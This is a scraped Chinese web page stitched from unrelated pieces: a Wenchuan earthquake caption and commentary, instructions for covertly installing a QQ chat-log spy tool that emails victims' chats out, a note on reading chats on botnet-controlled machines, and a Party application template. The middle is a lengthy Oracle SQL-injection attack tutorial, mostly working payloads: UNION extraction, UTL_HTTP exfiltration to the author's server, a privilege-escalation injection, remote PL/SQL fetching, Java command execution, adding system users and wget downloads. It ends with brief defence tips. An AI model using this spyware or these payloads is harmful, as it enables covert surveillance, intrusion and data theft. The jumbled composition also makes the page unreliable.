5月12日,受伤群众在都江堰景区入口处接受治疗。当日14时28分,四川汶川县发生7.8级地震,离汶川约100公里的都江堰市部分设施受损,多处房屋发生倒塌,目前伤亡情况正在统计之中]]>
首先下载最新版本的<QQ聊天记录偷看器2007>,解压后直接双击软件图表启动。点击工具栏中的“配置”按钮,在弹出窗口的“配置信息中选择”开机自动启动QQ聊天记录偷看器,“程序隐藏模式,”捕获QQ聊天记录,“捕获TM聊天记录,”时时记录等信息。
然后再选择窗口中的“远程选项,选中”启动自动发送聊天功能后,根据软件的提示输入收信信箱,发信信箱,邮箱帐号,邮箱密码等信息,然后确定推出即可。这样一来就可以远程获取聊天记文件。捕获的聊天记录以后顶定时发送到设置的信箱。
方法二;本地查看法
我就不一一介绍了,只要掌握方法一就可以了。
用到的工具有鸽子,肉鸡,QQ聊天记录查看器。我们随便找几个肉鸡看看有上QQ的吗!我们找一下他的QQ程序在哪里!这个是我们把它下载下来!有4M多大家等一下!下载好了我们找QQ聊天记录工具!看到了吧 能看到他的聊天记录吧!
一 Oracle 简单介绍
Oracle作为一款比较早期出现的RDBMS数据库,市场占有率比较大,经常用在一些大型数据库上。它本身除了很好地支持各种SQL语句外,还提供了各种丰富的包,存储过程,甚至支持java和创建library等特性,如此强大的功能为Hacking提供了很好的便利。
Oracle自身有很多默认的帐户,并且有很多的存储过程,这些存储过程是由系统建立的,很多默认都是对public开放的,在过去的几年里公布了很多oracle的漏洞,包括溢出和SQL注射在内的许多漏洞。在这里面,SQL注射漏洞显得格外严重,因为在Oracle里,在不加其他关键字AUTHID CURRENT_USER的情况下,创建的存储过程在运行时是以创建者身份运行的,而public对这些存储过程都有权限调用,所以一旦自带存储过程存在注射的话,很容易让普通用户提升到Oracle系统权限。Oracle本身内置了很多的帐户,其中一些帐户都有默认的密码并且具有CONNECT的权限,这样如果oralce的端口没有受到防火墙的保护又可以被人远程连接的话,就可以被人利用默认帐户远程登陆进系统然后利用系统里的存储过程的SQL注射漏洞,系统就会沦陷,当然,登陆进oracle还需要sid,不过这也并不困难,oracle的tnslintener默认没有设置密码,完全可以用tnscmd.pl用services命令查出系统的sid(到比较新的版本,这个漏洞已经被修复了),这也是非常经典的入侵oracle的方式。
二 Oracle Web Hacking 技术背景
oracle丰富的系统表。oracle几乎所有的信息都存储系统表里,当前数据库运行的状态,当前用户的信息,当前数据库的信息,用户所能访问的数据库和表的信息......系统表就是整个数据库的核心部分,通过恰当地查询需要的系统表,几乎可以获得所有的信息。如sys.v_$option就包含了当前数据库的一些信息,如是否支持java等,all_tables里就包含了所有的表信息,all_tab_colmuns包含所有的列信息等等,为我们获得信息提供了非常大的便利,后面将有关于如何利用系统表获取敏感信息的描述。
在oracle的各种漏洞里,需要特别说下存储过程的注射,其实也并没有什么神秘,存储过程和函数一样是接受用户的输入然后送到数据库服务器解析执行,如果是采取的组装成SQL字符串的形式执行的话,就很容易将数据和命令混淆,导致SQL注射。但是根据注射发生的点不同,一样地注射漏洞的性质也不同。Oracle使用的是PL/SQL,漏洞发生在select等DML语句的,因为不支持多语句的执行,所以如果想运行自己的语句如GRANT DBA TO LOVEHSELL这些DDL语句的话,就必须创建自己的函数或存储过程,如果没有这相关的权限还可以利用cursor注射,用dbms_sql包来饶过限制。大多数的注射正是上面这些有限制的注射,必须依靠自己创建的一些其他包或者cursor来实现提升权限的目的,但是还是有些非常少见但是注射环境非常宽松的漏洞,就是用户的输入被放在begin和end之间的匿名pl/sql块的注射,这种环境下的注射可以直接注射进多语句,几乎没有任何限制,而可以看到,正是这种闪光的漏洞为我们的web注射技术带来了怎样的辉煌。
好了,上面谈到的都是Oracle的一些攻击技术,但是现在很多的环境是,对外开放web服务,后台数据库被防火墙保护着,无法得到数据库的太多详细信息,已经不能直接登陆进数据库进行操作,这个时候就要考虑利用web下的漏洞来攻击后台的数据库了。现在来看下如何进行Oracle web环境下注射吧!oracle可以在各种web环境下良好地工作,各种web环境对我们注射的影响也并不是很大,在asp,.net,jsp中对进入的参数基本没做任何过滤,但是由于.net,jsp语言是强类型语言,在数字类型的注射上即使sql语句没有做过滤但是可能在接受参数的时候就出错了,所以注射出现在字符串类型的参数上比较多一些。在php环境下,所有的'会被转义为\',在oracle环境里\'并不会成为转义(在oracle环境里的正确转义应该为''),但是在我们自己的注射语句里使用'会因为被转成\'而遭到破坏,所以在注射时不能使用'。除此之外,web环境下就没什么限制了。在数据库方面,如果语句采取的是参数的方式执行,也不能够被注射,除非使用的是字符串连接的方式(由于字符串连接的方式比较简单,也因为一些历史上的原因,很多程序员往往会偏向于这种方式,),字符串连接方式的话也会分为两种,参数在select,update,insert这些DML语句之间,与参数在pl/sql匿名块之间,如果web程序没有捕获错误,那么我们很容易根据错误判断出当前语句的类型,后面会提到。在pl/sql匿名块之间的比较少见,但也不排除,这样的注射基本也是没有什么限制的,可以执行多语句,做任何事,跟本地登陆没有任何区别。
三 Oracle Web Hacking 基本思路
下面说说如何确定目标,注射参数的确定就由大家自己来了,主要是如何判断数据库属于oracle,根据数据库的特性很容易判断出来,oracle支持--类型注释,但是不支持;分隔执行多语句,oracle有很多系统表,譬如all_tables,通过对这些表的访问也可以判断出是否属于oracle,另外在oracle里的一些函数也可以用来判断,譬如utl_http.request这些,语言上的小细节也可以用来区分系统,譬如在oracle里||是连接符号,但是在其他数据库里就不是了,所以 and chr(123)||chr(123)=chr(123)||chr(123)这样的,如果可以顺利执行,那么就基本应该是oracle了,另外,一些脚本在出现数据库查询错误时,对错误信息没有处理,也会泄露真实的后台数据库,这个可以很明显地看出来。
然后需要确定的是注射点的类型,一般的情况下,我们进入的参数不是数字类型就基本是字符类型(其他很多人所说的搜索型注射其实还是应该归结于字符类型的),对于数字类型的基本不用考虑什么,很容易添加--注释字符就可以让语句正确闭合了,如果是字符类型的就要考虑如何让整个语句正确,通常是添加'以及--这些注射字符来构造自己的注射环境。在一些复杂的情况下,如同一个参数在多个sql语句和逻辑里出现,就要自己小心构造出符合环境的注射语句了,记住,我们只需要一个能便利插入自己sql命令的完好环境:)
在确定目标数据库为Oracle并且可以注射的时候,就可以开始尝试构造语句了。一般首先要进行的是判断当前的权限,在Oracle数据库里权限比较高的是DBA权限,拥有Oracle数据库的所有权限,另外如果当前用户的权限授予不对的话,也可以实现跨库查询的效果,可以通过对dba_tables这样的dba的表进行尝试访问来测试是否是dba。在一般的注射中,分为select类型注射,insert类型注射以及update类型等。update和insert类型的注射可以根据上下文来更改数据库中的数据,如利用update注射将表中某个重要字段更改成我们想要的值,即使这些数据库无关紧要也没关系,我们可以利用select子语句来将我们需要的数据查询出来然后在另外某个地方将这个数据读出来,只要遵循数据库的语法,实现自己的目的就可以了。在这里主要说下select类型的注射,如果我们能控制select语句的一部分的话,就可能实现这种类型注射,如果查询的结果可以返回到页面中的时候,还可以尝试使用union查询出结果,直接将内容显示在页面当中,这是最方便的一种。事实上后面可以看到,无论是什么注射,在oracle的web环境下,都可以直接执行系统命令返回shell。
Oracle中获得敏感数据,首先就是oracle有系统表,任何有权限获得数据都可以从这里获得,关键的系统表有all_tables,all_objects等,都是有权限能访问的,包括别人赋予你权限的,所以如果你的权限是dba的话,这能看到系统中所有的表,注射中一个技巧就是如果你需要从后台登陆但是不知道密码就可以在这里使用了,譬如猜测列名含不含有password等方法,后面的例子中也有讲述。
另外比较需要了解的就是union查询,在oracle union查询中和其他数据库类似,要求列数一样,还要求类型完全一致,oracle类型有很多,常见的有字符类型,数字类型以及日期类型等等,一般我们能用来做union查询并且显示的是字符类型,所以需要精确定位哪个字段符合我们的要求(1 会在页面显示,数据从进入到出来会有很多的流程,很多数据会在中间经过多次的处理,所以要想找到能显示出来的数据,很多时候并不是那么顺利,这种显示包括很多地方,包括返回的http头,页面正文甚至是cookie等。 2 字符类型 因为我们出来的数据大部分都是字符类型,所以需要这个类型用来正确地匹配 3长度需要足够 尽管我们可以用一些字符函数来解决这个问题,但是够长的字段总是非常简便 ),oracle并不会自己做数据类型转换,但是oracle中提供了一个NULL类型,可以匹配所有的数据类型,所以我们在定位完字段数之后就可以在union的各个字段填写null来匹配,另外oracle不支持select 1这样的查询,语法要求select必须有关键字,如果我们没有表可以用,可以用系统中默认谁都有权限的表dual。关于定位字段数其实也比较简单,和其他数据库一样可以利用order by 1-- 这样操作,如果字段个数存在就会正常,通常页面的逻辑会让这个参数 不只在一个地方出现,所以order by地方不一致,所以不能进行union查询。在这里可能会遇到目标语言不支持''的情况,所以可以使用chr这些函数来处理这些问题。
即使不支持union,oracle的一些特性还是让我们轻易拿到想要的信息,就是用系统的utl_http.request包,这个包你可以看做是一个普通的函数,用来取得远方web服务器的请求信息,所以我们完全可以自己监听端口,然后通过这个函数用请求将需要的数据发送过来,这个时候我们还可以用来查看数据库可不可以上网以及出口IP,是个非常重要的一点。正是有了这些系统里丰富的包和函数以及存储过程,使得只要有一个注射点,就可以在oracle里做任何事情,包括权限允许的和权限不允许的,记住,是任何事。
敏感数据只是我们想要的一部分,通常直接杀入oracle可能更有吸引力,这个时候查看系统的信息就非常地有价值了,对注射的灵活运用也非常重要。oracle在启动之后,把系统要用的一些变量都放置到一些特定的视图当中,可以利用这些视图获得想要的东西。通常非常重要的信息有
1 当前用户权限 (select * from session_roles)
2 当前数据库版本 (select banner from sys.v_$version where rownum=1)
3 服务器出口IP (用utl_http.request可以实现)
4 服务器监听IP (select utl_inaddr.get_host_address from dual)
5 服务器操作系统 (select member from v$logfile where rownum=1)
6 服务器sid (远程连接的话需要,select instance_name from v$instance;)
7 当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
......
知道上面这些之后就可以大致清楚服务器是在外网还是内网,支不支持远程连接,如果支持远程连接就可以尝试用默认的密码和刚得到的sid登陆了,在获得本地的权限之后,就可以尝试利用众多的包里面存在的注射提升权限了,在http://www.milw0rm.com/搜索oracle关键字可以找到很多这样的漏洞。
如果是远程并且不允许连接的的话,我们还是可以利用包的sql注射的,我上面说可以做任何事的,可以利用一个注射点轻易获得shell。上面说到在oracle里的包注射分好几种,这里需要的就是pl/sql块的注射,这个注射允许直接执行多语句,所以我们可以在web注射里利用这个直接以sys的身份执行多条语句,如添加用户,创建自己的存储过程等等,几乎没有限制。但是系统的这种注射也是非常地少见,在06年被人公布过一个,也就是SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES,具体的漏洞可以不了解,我也没有找到细节,后面有我做的一些简单黑盒分析,对于我们也只需要知道这是系统里存在的一个存储过程的pl/sql注射,可以导致执行多语句就可以了,而且oracle的补丁机制还不是很完善,基本上不会有管理员去patching这些,所以在我们看来就把这当作是系统提供的执行多语句的一个Hacking接口好了。如果你遇到一个sql注射本身就是在pl/sql里的话没,那么更要恭喜你了 :)
通过上面的几步基本让你可以获得你想要的东西,并且可以得到一个可以执行多语句的环境。在多语句执行的环境里,就可以利用oracle本身强大的功能,如支持java创建外部存储过程,支持utl_file包写文件等等,很方便地利用java写一个shell或者直接利用java包返回一个系统的shell。
四 真实世界里的注射
那么一个真实世界的注射应该是个什么样子呢?让我们试试如何从注射点来获得一个shell:)
首先,我们找到一个可能存在注射的页面,list.jsp?username=loveshell,我们添加一个'结果出错了,通过爆出的错误知道这是一个oracle的后台数据库,如含有ORA-xxxx这样的都是oracle,然后用语句:
list.jsp?username=loveshell' and ''||'1'='1 正常
list.jsp?username=loveshell' and ''||'2'='1 返回空
list.jsp?username=loveshell'--
这样可以知道是一个oracle的字符类型的注射点,那么我们就可以用这种方式插入自己的SQL语句了
list.jsp?username=loveshell' and [我们的sql语句] --
这个时候我们就可以根据自己的目标考虑后续的入侵思路了,一种是向web方向发展,通过查询数据库的信息来渗透web,一种就是直接入侵数据库,当然,最完美的情况下是oracle和web是一台机器。先说说如何查询数据库里存储的信息吧!要想取得信息就要将信息反馈回来,一种是利用union查询,譬如这里我们的入侵手法类似于下面:
list.jsp?username=loveshell' order by 10 -- 错误,如果错误信息被反馈的话应该会出现xx coloum不存在之类的,字段数小于10
list.jsp?username=loveshell' order by 5 -- 正常显示,字段数大于5
......
最后发现到order by 8的时候错误,order by 7 就正常,说明是7个字段。注意这里,一般的时候,页面的逻辑很简单,所以可以这样order by猜测,但是如果这个参数进入了2个以上sql语句,里面结果的字段数不一,就难用这种方法了,当然,如果进入2个以上Sql语句的话,估计union查询也无法使用了,因为sql语句的前后字段数会不一,无法满足条件,后面我们将说到一种万能的获取数据的方法,这里先说比较直观的union查询。
list.jsp?username=loveshell' union select NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual-- 用7个NULL来匹配对应的字段不会出现字段类型不一的情况,与mysql不同,后面的select语句必须加一个存在的表,这里是dual。
这里正常返回,然后我们就可以继续了,寻找的用做信息反馈的字段需要满足我上面在基本思路里的几个条件。
list.jsp?username=loveshell' and 1=2 union select 1,NULL,NULL,NULL,NULL,NULL,NULL from dual-- 正常
list.jsp?username=loveshell' and 1=2 union select 1,2,NULL,NULL,NULL,NULL,NULL from dual-- 错误,第二个字段不是数字类型
list.jsp?username=loveshell' and 1=2 union select 1,'2',NULL,NULL,NULL,NULL,NULL from dual-- 错误,第二个字段不是字符类型
这种情况是可能的,因为字段里还包括其他的如日期等类型,这种类型对于我们反馈信息没什么用,所以用NULL直接跳过。
list.jsp?username=loveshell' and 1=2 union select 1,NULL,'3',NULL,NULL,NULL,NULL from dual-- 这个时候正常了,而且在页面的对应的位置显示了,这个字段正是我们要找的。有的时候如果想看某个数字是多少怎么办呢?譬如想看记录的条数,直接二分法是可以的,但是直接显示出来还是比较直观,譬如想看dba_tables的记录数
list.jsp?username=loveshell' and 1=2 union select 1,to_char((select count(*) from dba_tables),'0000000'),NULL,NULL,NULL,NULL,NULL from dual--
当然还有其他to_系列函数,间接实现其他数据库里的自动转换。这个字段在页面显示并且也足够长,放得下我们的数据,所以我们就可以充分利用这个字段来进行查询了,譬如获得系统的版本信息可以用
list.jsp?username=loveshell' and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),NULL,NULL,NULL,NULL,NULL from dual--
如果不能使用union,也没有关系,只要是oracle数据库,我们一样可以把信息给返回来,不用经典查询那么悲观,首先本地用nc -l -vv -p 9999,然后就可以很简单地用
list.jsp?username=loveshell' and UTL_HTTP.request('http://www.loveshell.net:9999/'||(select banner from sys.v_$version where rownum=1))=1--
这个时候loveshell.net的9999端口就应该返回sys.v_$version的banner了,就是数据库的版本,我们还获得了数据库所在网络的ip,呵呵,另外还知道数据库是否允许外连等信息。这里使用子查询来获得数据,Oracle没有limit这样的语句所以可以用where rownum=1来返回第一条数据。但是如果想知道其他某一条记录怎么办呢?直接rownum=2是不行的,这里可以再次嵌套一个子查询
list.jsp?username=loveshell' and UTL_HTTP.request('http://www.loveshell.net:9999/'||(select data from (select rownum as limit,banner as data from sys.v_$version) where limit =2)=1--
这样就可以得到第二条记录了,灵活运用可以很快取得需要的数据。
其他的如后台的帐户什么的都可以这样返回来。这种数据的窃取手段适用于update和insert等等一切可以使用函数的地方:),如果不确信存不存在UTL_HTTP包,可以用语句select count(*) from all_objects where object_name='UTL_HTTP'来判断了,注意,在系统表里的数据是大小写敏感的,但是关键字本身是大小写不敏感的。另外某些少数主机也是没有配置dns或者不能上网,没有配置dns的话可以通过用ip访问的方法来测试,不能上网的就要用其他方法了。
能获取数据了,我们继续向web的后台靠拢,如果我们知道了后台的地址但是没有密码,我们就可以通过查询系统表来找找敏感字段如passwd在哪,然后用上面的信息窃取手段给弄回来。all_tables包含了所有的表的信息,想找有包含passwd的字段在哪就可以用all_tab_columns:
list.jsp?username=loveshell' and 1=2 union select 1,NULL,(select table_name||chr(35)||column_name from all_tab_columns where column_name like '%25PASS%25' and ROWNUM=1),NULL,NULL,NULL,NULL from dual--
其中的%25为%的转码,这样就能获得我们需要的敏感数据了,另外注意在oracle的系统表里数据都是大写的,所以用PASS而不是pass,或者用函数转成小写也可以,如lower(column_name) like '%25pass%25',进入web后台后可以继续通过后台的功能进行渗透了。
刚才说的另外一种思路是直接获得系统的shell,在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限,是非常诱人的。我们来看看如何操作吧!首先当然要用到我们上面说到的系统中比较少见的pl/sql注射,另外为了说明在php环境下对注射的处理,我们现在来假设我们的入侵环境是在php+Oracle上面,并且防火墙已经限制了对oracle端口的直接访问,如果是开放的话用网络上的直接添加系统帐户的方法也很容易成功!
首先是SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES这个函数的注射的一些简单解析
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''CREATE USER TESTYOU IDENTIFIED BY TESTYOU '''';END;'';END;--','SYS',0,'1',0)=''
这是我看到的原形,分析下就知道是在第三个参数存在的注射,并且是因为"没有过滤造成的,把第三个参数提取出来就是
DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''CREATE USER TESTYOU IDENTIFIED BY TESTYOU '''';END;'';END;--
可以看到DBMS_OUTPUT".PUT(:P1);与END;--之间的所有部分都是原有漏洞注射语句的地方,里面是''是因为我们要提交进',但是外层将字符串括起来的正是',所以需要对'进行转义,用的就是'',后面可以看到用chr函数可以避免这一点。这里我们将要提取出来用在web Hacking上,这个函数提取出来的原形就是:
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);[多语句]END;--','SYS',0,'1',0)
我们要执行多语句,并且不希望见到会被php处理的'的话就要对这个进行简单地再变形,多语句里如果出现'的话需要用''转义。
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||[多语句]||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)
没有出现',并且可以执行多语句的的部分也很明确,用在web hacking上的模式就是
list.php?username=loveshell' and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||[多语句]||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)=0--
呵呵,前面第一个loveshell'不被影响是因为会被转成loveshell\',而这个被oracle看作是loveshell\这个字符串后面跟一个',完全合法。这个漏洞是跟系统有关的,我们起码需要测试一下漏洞存在与否吧?也很简单,如果整个参数被处理好的话,我们在多语句里填写非法的语句是应该正常解析才对,所以测试可不可以执行多语句就用
list.php?username=loveshell' and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||[一个非法的sql语句,如chr(79)]||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)=0--
如果出错了的话就说明漏洞是存在的(我测试的主机基本都有这个漏洞:P)但是到这大家也可以看到一个非常麻烦的事情,我们的多语句里的每个字符都转换成为chr的话整个参数将非常庞大,所以这里借用以下shellcode的概念,将我们的exploit放在另外一个地方,看我的语句吧!
list.php?username=loveshell' and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||utl_http.request('http://www.loveshell.net/shellcode.txt')||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)=0--
对,既然我们传的多语句只是字符串,为什么不把字符串放到远程的机器上然后用utl_http包取回来执行呢:),这里为了演示方便我并没有对http://www.loveshell.net/shellcod.txt进行chr转换,实际php环境下还是需要转换的。
好了,到这里我们能做到的是让Oracle将我远程机器上的一个文件作为PL/SQL运行了,很好,把前面的都放开,看如何利用现在的条件返回一个shell。查询相关的文档,知道比较通用一点返回shell的好方法是利用java外部存储过程,并且现在的除非是个人机器上,一般的都是支持java的选项的,所以我们需要先来用java创建一个执行命令的存储过程。作为我们的shellcode需要变换一点东西,就是将必要的地方的'变成'',为什么要这样前面讲过了。
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS import java.lang.*;import java.io.*;public class JAVACMD{public static void execCommand (String command) throws IOException {Runtime.getRuntime().exec(command);}};'';END;';
这样就创建了一个JAVACMD的java包,里面含有个函数execCommand,然后开始创建Oracle的存储过程,
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2) AS LANGUAGE JAVA NAME ''''JAVACMD.execCommand (java.lang.String)'''';'';END;';
这样放到我们的http://www.loveshell.net/shellcod.txt里,然后依次请求上面的那个注射的语句(使用之前请先将其中的utl_http.request('http://www.loveshell.net/shellcod.txt')替换为utl_http.request(chr()....chr())的形式),就会在服务器创建存储了个javacmdproc过程了,参数是字符串,会被当作命令执行。我们执行试试
将shellcode.txt内容换成
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin javacmdproc(''''cmd.exe /c net user loveshell loveshell /add'''');end;'';END;';
或者在linux下就是
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin javacmdproc(''''wget http://www.loveshell.net -O /tmp/loveshell'''');end;'';END;';
呵呵,有可能成功,但是也有可能出现类似于下面的情况
ERROR at line 1:
ORA-29532: Java call terminated by uncaught Java exception:
java.security.AccessControlException: the Permission (java.io.FilePermission
<<ALL FILES>> execute) has not been granted to LOVESHELL. The PL/SQL to grant
this is dbms_java.grant_permission( 'LOVESHELL', 'SYS:java.io.FilePermission',
'<<ALL FILES>>', 'execute' )
ORA-06512: at "LOVESHELL.JAVACMDPROC", line 0
ORA-06512: at line 1
没关系,java在oracle也是需要权限的,我们需要把相关的权限给它才可以哦!在Oracle里这样操作的
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''grant javasyspriv to loveshell;'';END;';
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin exec dbms_java.grant_permission(''''LOVESHELL'''',''''SYS:java.io.FilePermission'''',''''<<ALL FILES>>'''',''''execute'''');end;'';END;';
各个服务器可能设置不一样,根据他提示要求的权限赋予给它就可以了。
根据自己的情况将这个语句类似的语句放到shellcode.txt里执行,然后就可以顺利地执行命令了。java本身是很强大的,直接返回shell也是可能的。当然,当数据库在本机的时候,利用系统中存在的utl_file包写一个文件也是可以的。这里提供简单的,可以作为shellcode.txt里运行的代码
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace procedure utlwritefile(p_directory in varchar2, p_filename in varchar2, p_line in varchar2) as fd utl_file.file_type;begin fd := utl_file.fopen(p_directory, p_filename, ''''a''''); utl_file.put_line(fd, p_line); if (utl_file.is_open(fd) = true) then utl_file.fclose(fd); end if;end;'';END;';
这是创建能写文件的utlwritefile存储过程,注意这里的目录是oracle里的虚拟目录,不是物理目录,我们需要自己创建一个虚拟目录并且给予相关的权限
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace directory utl_dir_new as ''''f:/inc/'''''';END;';
这里假设需要写东西到f:/inc里,建立了个utl_dir_new的oracle目录,然后给权限
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''grant write on directory utl_dir_new to public;'';END;';
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin utlwritefile(''''UTL_DIR_NEW'''',''''1.php'''',''''test'''');end;'';END;';
注意UTL_DIR_NEW的大小写,这里写了个test到UTL_DIR_NEW里面的1.php里。
五 环境限制
上面演示的是用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES这个函数的漏洞,漏洞跟版本有很大关系,所以上面的信息探测也比较重要。实际上,在早点的8i版本里也有类似的漏洞,ctxsys.driload.validate_stmt('grant dba to scott')这样的形式可以直接以高权限身份执行各种Oracle语句,也可以相应地用在web环境注射里。只要存在可用来执行多语句的漏洞,web注射就有非常大的利用价值。
六 关于防护
首先就是尽量有好的编程习惯,避免使用字符串连接的方式来执行Sql语句,如果一定要采用字符串连接方式来执行Sql,那也对进入的参数必须做好过滤,是数字类型的话就强制为数字,是字符串类型的就要做好过滤,从数据库等其他途径过来的数据也必须做好验证,在web app上杜绝Sql注射漏洞。另外在Oralce方面就是要做好对1521端口的防火墙过滤,避免被人直接登陆,对一些不需要的包和存储过程可以考虑删除,对一些Sql注射漏洞也要及时做好补丁,避免数据库的沦陷。
参考资料及网站
1 http://www.milw0rm.com/
2 《The_Oracle_Hacker's_Handbook_Hacking_and_Defending_Oracle》
3 http://blog.csdn.net/kj021320/archive/2007/08/28/1762769.aspx
4 http://www.red-database-security.com/
5月12日,受伤群众在都江堰景区入口处接受治疗。当日14时28分,四川汶川县发生7.8级地震,离汶川约100公里的都江堰市部分设施受损,多处房屋发生倒塌,目前伤亡情况正在统计之中]]>
没有预报,没有征兆,不仅是汶川百姓,全国其它地方的民众都不约而同地感受到了这场天灾的威力,纷纷跑出房间,寻求权威的答案。这次我们的媒体还真是反应神速,新闻报道几乎与地震同步,信息公开透明。14时46分,新华网发布权威消息,让震中以外的民众顿时对异常情况有了全面了解;15时12分,新华网推出专题《地震应急措施》;与此同时,云南、河南、湖北等省市也迅速利用广播电视、网络、手机报等及时转发地震权威信息,消除居民的恐慌心态。
更让人称道的是,汶川地震发生后,胡锦涛总书记立即作出重要指示,要求尽快抢救伤员,保证灾区人民生命安全。温家宝总理率民政部部长李学举等,在第一时间赶赴灾区指导救灾工作。温家宝总理在赶往灾区的专机上说:“党中央国务院高度重视这次特别重大的地震灾害,成立了以我为总指挥的抗震救灾指挥部,设立救援组、预报监测组等8个工作组。” 温家宝要求各级领导干部要站在抗震救灾的第一线,身先士卒,带领广大群众做好抗震救灾工作。
众所周知,地震自古以来就有,人们是无法控制的。但在当今这个现代信息社会里,能否迅速反应、积极应对,则在某种程度上考验着我们执政智慧和善治能力。汶川地震让我们看到了中国的应急速度——16时,民政部从西安中央救灾物资储备库紧急调拨5000顶救灾帐篷支援四川灾区;中国地震局启动一级预案,一支180的救援队伍迅即集结飞往灾区,协助指导抗震救灾工作;中国红十字会总会紧急向灾区调拨价值78万余元的救灾物资……
哪里有灾情,哪里有危险,哪里就有我们子弟兵的身影。汶川灾情发生以后,成都军区立即派出两架军用直升机飞赴灾区查看灾情;驻渝某集团军、成都军区总医院、武警部队共出动兵力三千多人,参加抗震救灾;空军两家伊尔76军用运输机16日晚紧急运送国家地震灾区紧急救援队前往灾区。公安部也迅速发出紧急通知,要求各地公安机关全警动员、全力以赴投入抗震抢险救灾,最大限度地抢救伤员,最大限度地减少人民群众的生命损失。
严重的自然灾害对我们是一场考验,也是一次锻炼。我们无法控制地震,但我们能够应对地震。在突如其来的地震灾害面前,最重要的是镇定、信心、勇气和强有力的指挥。我们相信,有党中央国务院的关心和支持,有各级领导干部和广大党员的身先士卒,有广大群众的理解、支持、配合,心往一处想,劲往一处使,团结一致,众志成城,再大的灾害我们都有信心有能力去战胜,再大的困难我们都有办法有力量去克服,并最终取得抗击这场特别重大的地震灾害的最后胜利!
敬爱的党组织:
我志愿加入中国共产党,愿意为共产主义事业奋斗终身。我衷心地热爱党,她是中国工人阶级的先锋队,是中国各族人民利益的忠实代表,是中国社会主义事业的领导核心。中国共产党以实现共产主义的社会制度为最终目标,以马克思列宁主义、毛泽东思想、邓小平理论为行动指南,是用先进理论武装起来的党,是全心全意为人民服务的党,是有能力领导全国人民进一步走向繁荣富强的党。她始终代表中国先进生产力的发展要求,代表中国先进文化的前进方向,代表中国最广大人民的根本利益,并通过制定正确的路线方针政策,为实现国家和人民的根本利益而不懈奋斗。【入党申请书范文】
